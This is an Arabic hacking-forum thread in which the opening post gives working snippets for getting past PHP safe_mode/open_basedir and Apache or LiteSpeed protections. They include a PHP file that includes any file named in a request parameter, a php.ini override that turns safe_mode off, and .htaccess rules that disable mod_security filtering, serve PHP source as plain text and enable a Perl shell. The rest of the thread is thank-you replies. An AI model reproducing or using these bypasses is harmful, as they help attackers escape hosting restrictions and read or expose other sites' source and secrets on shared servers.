حالة الموضوع:
مغلق
  1. أمير عرش الدموع

    أمير عرش الدموع DeveloPer Plus

    الأنتساب:
    ‏25 يناير 2012
    المشاركات:
    111
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    18
    الإقامة:
    IRAQ
    السلام عليكم و رحمة الله تعالى و بركاته
    أنا جمعت بعض الأكواد ان شاء الله تفيدكم
    هنالك فرق في التخطي
    الأول هو التخطي السيف مود و يكون في اصدارات php
    مثال هدا الكود في ini.php

    كود PHP:
    <?
    echo 
    ini_get("safe_mode");
    echo 
    ini_get("open_basedir");
    include(
    $_GET["file"]);
    ini_restore("safe_mode");
    ini_restore("open_basedir");
    echo 
    ini_get("safe_mode");
    echo 
    ini_get("open_basedir");
    include(
    $_GET["ss"]);
    ?>
    و كدلك ملف php.ini

    كود PHP:
    short_open_tag On
    log_errors 
    On
    log_errors_max_len 
    1024
    ignore_repeated_errors 
    On
    register_globals 
    Off
    magic_quotes_runtime 
    Off
    magic_quotes_gpc 
    On
    allow_url_fopen 
    on
    AddHandler application
    /x-httpd-php4 .php
    display_errors 
    Off
    disable_functions 
    Bypass By ReD
    safe_mode 
    Off
    ملاحظة : هده الطريقة لا تتخطى جميع الاصدارات
    لكن تتخطى في كثير من الأحيان
    نجي الأن ما يخص تخطي apache الاباتشي أو ليتسبيد
    لما نريد عمل اختصار مجلد أو عمل سملنك لملف معين
    يطلع معانا خطأ Forbidden + Internal Server Error + 406 not acceptable
    نسوي هتاكسس و نشوف هدا الكود

    كود PHP:
    <IfModule mod_security.c>
    SecFilterEngine Off
    SecFilterScanPOST Off
    </IfModule
    DirectoryIndex seees.html
    Options 
    +Indexes
    AddType text
    /plain .php
    AddHandler server
    -parsed .php
    AddType text
    /plain .html
    AddType text
    /plain .pl
    AddType text
    /plain .asp
    AddType text
    /plain .htm
    AddType text
    /plain .shtml
    AddType text
    /plain .shtm
    AddType text
    /plain .htaccess
    Options all
    DirectoryIndex Sux
    .html
    AddType text
    /plain .php
    AddHandler server
    -parsed .php
    AddType text
    /plain .html 
    نجي نحلل هدا الهتاكسس
    هدا بيتخطى كثير الفوربدن

    كود PHP:
    Options all
    DirectoryIndex Sux
    .html
    AddType text
    /plain .php
    AddHandler server
    -parsed .php
    AddType text
    /plain .html
    أما بالنسبة ل 406 not acceptablr
    فالحل هو هدا

    كود PHP:
    <IfModule mod_security.c>
    SecFilterEngine Off
    SecFilterScanPOST Off
    </IfModule
    أما Internal Server Error
    فهدا الكود بيتخطاه


    كود PHP:
    DirectoryIndex seees.html
    Options 
    +Indexes
    AddType text
    /plain .php
    AddHandler server
    -parsed .php
    AddType text
    /plain .html
    AddType text
    /plain .pl
    AddType text
    /plain .asp
    AddType text
    /plain .htm
    AddType text
    /plain .shtml
    AddType text
    /plain .shtm
    AddType text
    /plain .htaccess
    اه كمان شئ مهم
    مثلا لو أريد تشغيل البيرل كمثال في السرفر
    رح أحط مثلا في الهتاكسس هون AddType application/x-httpd-cgi.red
    مع انشاء ملف اخر بيرل يكون shellperl.red
    ما الى هدا هناك طرق كثييييرة جدا في التخطي
    و ارجو من الشباب التفريق ما بين هدان الأمرين
    والله ولي التوفيق
    سلام :{1}:​
     
  2. روبورت1

    روبورت1 <img src="http://im34.gulfup.com/s2o63.gif"><br>فر

    الأنتساب:
    ‏8 نوفمبر 2012
    المشاركات:
    654
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    18
    عزيزي الكاتب ، شكراً لك على الإفادة في المنتدى بإضافة مادّة علمية جديدة إليه
    كتب الله لك أجر كل من استفاد منها.

    * تنبيه للأعضاء والزوّار ، نتمنّى عدم دخول أيّة روابط خارجيّة أو تحميل أي مرفق موجود بالموضوع
    حتى يتم تأكيد سلامة المحتوى برد من قبل أحد أعضاء فريق الفحص أو مشرف القسم.

    [warning]هذه العضوية آليّة ، غير مُدارة من قبل أي عُنصر بشري ، إنما مبرمجة لتقوم ببعض أعمال التنظيم والمتابعة في المنتدى.[/warning] ​
     
  3. ! ـآوتآر !

    ! ـآوتآر ! DeveloPer Plus

    الأنتساب:
    ‏19 يوليو 2012
    المشاركات:
    192
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    18
    الإقامة:
    السـ جــــده ـعوديـة
    رد: الفرق بين تخطي حمايات php و apache خطأ يقع فيه الكثير

    *

    وٌعٌلَيِکمً الَسِلَامً وٌرحًمًة الَلَهّ وٌبًرکاتٌتٌهّ

    يِعٌطِيِک الَعٌافُيِة

    تٌسِسِلَمً يِمًيِنِک
     
  4. Dr.HaMoOoD

    Dr.HaMoOoD Developer

    الأنتساب:
    ‏17 ديسمبر 2011
    المشاركات:
    27
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    الوظيفة:
    اخترآق آجهزه آليهود
    الإقامة:
    Bahrain
    رد: الفرق بين تخطي حمايات php و apache خطأ يقع فيه الكثير

    [ .. Good Job My Dear .. ]
     
  5. GosTeR DZ

    GosTeR DZ DeveloPer Plus

    الأنتساب:
    ‏5 يناير 2013
    المشاركات:
    111
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    18
    الإقامة:
    Algeria
    رد: الفرق بين تخطي حمايات php و apache خطأ يقع فيه الكثير

    تسلم الايادي يا بطل’,
     
  6. BOT AL IRAQ

    BOT AL IRAQ DeveloPer Plus

    الأنتساب:
    ‏24 نوفمبر 2012
    المشاركات:
    125
    الإعجابات المتلقاة:
    10
    نقاط الجائزة:
    18
    الوظيفة:
    HACKING
    الإقامة:
    IRAQ / BASRA
    رد: الفرق بين تخطي حمايات php و apache خطأ يقع فيه الكثير

    السلام عليكم ...
    عاشت ايدك حبيبي ...
    تقبل مروري ...
    اخوك في الله ...
     
  7. Scorpion

    Scorpion Developer

    الأنتساب:
    ‏15 يونيو 2012
    المشاركات:
    55
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    8
    الإقامة:
    DZ
    رد: الفرق بين تخطي حمايات php و apache خطأ يقع فيه الكثير

    الله يعطيك العافية
     
  8. فيصــــــــل

    فيصــــــــل Developer

    الأنتساب:
    ‏3 أغسطس 2012
    المشاركات:
    40
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    8
    الإقامة:
    السعودية
    رد: الفرق بين تخطي حمايات php و apache خطأ يقع فيه الكثير

    رائع جدا وبارك الله فيك ​
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة